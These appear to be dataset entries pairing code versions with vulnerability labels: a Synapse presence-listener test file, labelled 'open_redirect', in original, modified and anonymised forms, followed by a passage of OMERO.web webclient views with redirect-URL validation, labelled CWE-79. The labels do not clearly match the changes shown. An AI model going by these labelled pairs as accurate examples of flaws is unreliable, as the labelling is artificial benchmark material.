When presence is on, the stub servlet will not register.
"""
# Presence is on
self.hs.config.use_presence = True
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 400 + unrecognised, because nothing is registered
self.assertEqual(channel.code, 400)
self.assertEqual(channel.json_body["errcode"], "M_UNRECOGNIZED")
def test_listen_http_with_presence_disabled(self):
"""
When presence is off, the stub servlet will register.
"""
# Presence is off
self.hs.config.use_presence = False
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 401, because the stub servlet still checks authentication
self.assertEqual(channel.code, 401)
self.assertEqual(channel.json_body["errcode"], "M_MISSING_TOKEN")
| # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class FrontendProxyTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=GenericWorkerServer
)
return hs
def default_config(self):
c = super().default_config()
c["worker_app"] = "synapse.app.frontend_proxy"
c["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return c
def test_listen_http_with_presence_enabled(self):
"""
When presence is on, the stub servlet will not register.
"""
# Presence is on
self.hs.config.use_presence = True
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 400 + unrecognised, because nothing is registered
self.assertEqual(channel.code, 400)
self.assertEqual(channel.json_body["errcode"], "M_UNRECOGNIZED")
def test_listen_http_with_presence_disabled(self):
"""
When presence is off, the stub servlet will register.
"""
# Presence is off
self.hs.config.use_presence = False
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 401, because the stub servlet still checks authentication
self.assertEqual(channel.code, 401)
self.assertEqual(channel.json_body["errcode"], "M_MISSING_TOKEN")
| open_redirect | {
"code": [
" http_client=None, homeserver_to_use=GenericWorkerServer"
],
"line_no": [
26
]
} | {
"code": [
" federation_http_client=None, homeserver_to_use=GenericWorkerServer"
],
"line_no": [
26
]
} |
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_2 = self.setup_test_homeserver(
http_client=None, homeserver_to_use=GenericWorkerServer
)
return VAR_2
def FUNC_1(self):
VAR_3 = super().default_config()
VAR_3["worker_app"] = "synapse.app.frontend_proxy"
VAR_3["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return VAR_3
def FUNC_2(self):
self.hs.config.use_presence = True
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 400)
self.assertEqual(VAR_6.json_body["errcode"], "M_UNRECOGNIZED")
def FUNC_3(self):
self.hs.config.use_presence = False
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 401)
self.assertEqual(VAR_6.json_body["errcode"], "M_MISSING_TOKEN")
|
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_2 = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=GenericWorkerServer
)
return VAR_2
def FUNC_1(self):
VAR_3 = super().default_config()
VAR_3["worker_app"] = "synapse.app.frontend_proxy"
VAR_3["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return VAR_3
def FUNC_2(self):
self.hs.config.use_presence = True
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 400)
self.assertEqual(VAR_6.json_body["errcode"], "M_UNRECOGNIZED")
def FUNC_3(self):
self.hs.config.use_presence = False
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 401)
self.assertEqual(VAR_6.json_body["errcode"], "M_MISSING_TOKEN")
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
20,
21,
24,
28,
30,
34,
43,
45,
50,
52,
53,
55,
56,
59,
61,
62,
65,
70,
72,
73,
75,
76,
79,
81,
82,
85,
47,
48,
49,
67,
68,
69
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
20,
21,
24,
28,
30,
34,
43,
45,
50,
52,
53,
55,
56,
59,
61,
62,
65,
70,
72,
73,
75,
76,
79,
81,
82,
85,
47,
48,
49,
67,
68,
69
] |
1CWE-79
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import is_safe_url
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
try:
import long
except ImportError:
long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_list(request, name):
val = request.GET.getlist(name)
return [i for i in val if i != ""]
def get_longs(request, name):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
def validate_redirect_url(url):
"""
Returns a URL is safe to redirect to.
If url is a different host, not in settings.REDIRECT_ALLOWED_HOSTS
we return webclient index URL.
"""
if not is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
url = reverse("webindex")
return url
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context["template"] = settings.INDEX_TEMPLATE
except Exception:
context["template"] = "webclient/index.html"
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context["template"] = "webclient/index.html"
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
else:
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
"""Keeps the OMERO session alive by pinging the server"""
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
# avoid recursive calls
if url is None or url.startswith(reverse("change_active_group")):
url = reverse("webindex")
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = get_long_or_default(request, "active_group", None)
if active_group is None:
return
active_group = int(active_group)
if (
"active_group" not in request.session
or active_group != request.session["active_group"]
):
request.session.modified = True
request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = (
request.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", default_name)
)
return {
"id": -1,
"omeName": label,
"firstName": label,
"lastName": "",
}
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except Exception:
logger.error("Exception during logout.", exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
else:
context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
template = "webgateway/base/includes/post_form.html"
return render(request, template, context)
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get("template", None)
if template is None:
if menu == "userdata":
template = "webclient/data/containers.html"
elif menu == "usertags":
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get("show", Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# If we failed to find 'show'...
if request.GET.get("show", None) is not None and first_sel is None:
# and we're logged in as PUBLIC user...
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == conn.getUser().getOmeName()
):
# this is likely a regular user who needs to log in as themselves.
# Login then redirect to current url
return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
# need to be sure that tree will be correct omero.group
if first_sel is not None:
group_id = first_sel.details.group.id.val
if conn.isValidGroup(group_id):
switch_active_group(request, group_id)
else:
first_sel = None
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.GET.copy())
if menu == "search":
if global_search_form.is_valid():
init["query"] = global_search_form.cleaned_data["search_query"]
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get("load_template_url", None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = request.session.get("active_group") or conn.getEventContext().groupId
# prepare members of group...
leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get("experimenter")
if initially_open_owner is not None:
if request.session.get("user_id", None) != -1:
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except Exception:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (
user_id
not in (
set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
)
and user_id != -1
):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get("user_id", None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session["user_id"] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = list(myColleagues.values())
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
"menu": menu,
"init": init,
"myGroups": myGroups,
"new_container_form": new_container_form,
"global_search_form": global_search_form,
}
context["groups"] = groups
context["myColleagues"] = myColleagues
context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
context["active_user"] = conn.getObject("Experimenter", long(user_id))
context["initially_select"] = show.initially_select
context["initially_open"] = show.initially_open
context["isLeader"] = conn.isLeader()
context["current_url"] = url
context["page_size"] = settings.PAGE
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
context["member_of_groups"] = conn.getEventContext().memberOfGroups
context["search_default_user"] = settings.SEARCH_DEFAULT_USER
context["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId,
]
groups = conn.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
groups = [g for g in groups if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
"template": "webclient/base/includes/group_user_content.html",
"current_url": url,
"groups": groups,
"myGroups": myGroups,
}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get the groups
groups = tree.marshal_groups(
conn=conn, member_id=member_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": groups})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest("Invalid experimenter id")
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id
)
if experimenter is None:
raise Http404("No Experimenter found with ID %s" % experimenter_id)
return JsonResponse({"experimenter": experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
experimenter_id = get_long_or_default(request, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
r = dict()
try:
# Get the projects
r["projects"] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned datasets (without project parents)
r["datasets"] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the screens for the current user
r["screens"] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned plates (without project parents)
r["plates"] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned images container
try:
orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
orph_t = {"enabled": True}
if (
conn.isAdmin()
or conn.isLeader(gid=request.session.get("active_group"))
or experimenter_id == conn.getUserId()
or orph_t.get("enabled", True)
):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
orphaned["name"] = orph_t.get("name", "Orphaned Images")
r["orphaned"] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
project_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the datasets
datasets = tree.marshal_datasets(
conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
"""Get a list of images
Specifiying dataset_id will return only images in that dataset
Specifying experimenter_id will return orpahned images for that
user
The orphaned images will include images which belong to the user
but are not in any dataset belonging to the user
Currently specifying both, experimenter_id will be ignored
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
dataset_id = get_long_or_default(request, "id", None)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
thumb_version = get_bool_or_default(request, "thumbVersion", False)
date = get_bool_or_default(request, "date", False)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = "share_id" in kwargs and long(kwargs["share_id"]) or None
try:
# Get the images
images = tree.marshal_images(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
screen_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the plates
plates = tree.marshal_plates(
conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
plate_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest("id (plate) must be specified")
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
"""This is just used internally by api_link DELETE below"""
if parent_type == "orphaned":
return None
link_type = None
if parent_type == "experimenter":
if child_type in ["dataset", "plate", "tag"]:
# This will be a requested link if a dataset or plate is
# moved from the de facto orphaned datasets/plates, it isn't
# an error, but no link actually needs removing
return None
elif parent_type == "project":
if child_type == "dataset":
link_type = "ProjectDatasetLink"
elif parent_type == "dataset":
if child_type == "image":
link_type = "DatasetImageLink"
elif parent_type == "screen":
if child_type == "plate":
link_type = "ScreenPlateLink"
elif parent_type == "tagset":
if child_type == "tag":
link_type = "AnnotationAnnotationLink"
if not link_type:
raise Http404("json data needs 'parent_type' and 'child_type'")
params = omero.sys.ParametersI()
params.addIds(child_ids)
qs = conn.getQueryService()
# Need to fetch child and parent, otherwise
# AnnotationAnnotationLink is not loaded
q = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:ids)
"""
% link_type
)
if parent_id:
params.add("pid", rlong(parent_id))
q += " and olink.parent.id = :pid"
res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
if parent_id is not None and len(res) == 0:
raise Http404(
"No link found for %s-%s to %s-%s"
% (parent_type, parent_id, child_type, child_ids)
)
return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
"""This is just used internally by api_link DELETE below"""
if parent_type == "experimenter":
if child_type == "dataset" or child_type == "plate":
# This is actually not a link that needs creating, this
# dataset/plate is an orphan
return "orphan"
if parent_type == "project":
project = ProjectI(long(parent_id), False)
if child_type == "dataset":
dataset = DatasetI(long(child_id), False)
link = ProjectDatasetLinkI()
link.setParent(project)
link.setChild(dataset)
return link
elif parent_type == "dataset":
dataset = DatasetI(long(parent_id), False)
if child_type == "image":
image = ImageI(long(child_id), False)
link = DatasetImageLinkI()
link.setParent(dataset)
link.setChild(image)
return link
elif parent_type == "screen":
screen = ScreenI(long(parent_id), False)
if child_type == "plate":
plate = PlateI(long(child_id), False)
link = ScreenPlateLinkI()
link.setParent(screen)
link.setChild(plate)
return link
elif parent_type == "tagset":
if child_type == "tag":
link = AnnotationAnnotationLinkI()
link.setParent(TagAnnotationI(long(parent_id), False))
link.setChild(TagAnnotationI(long(child_id), False))
return link
return None
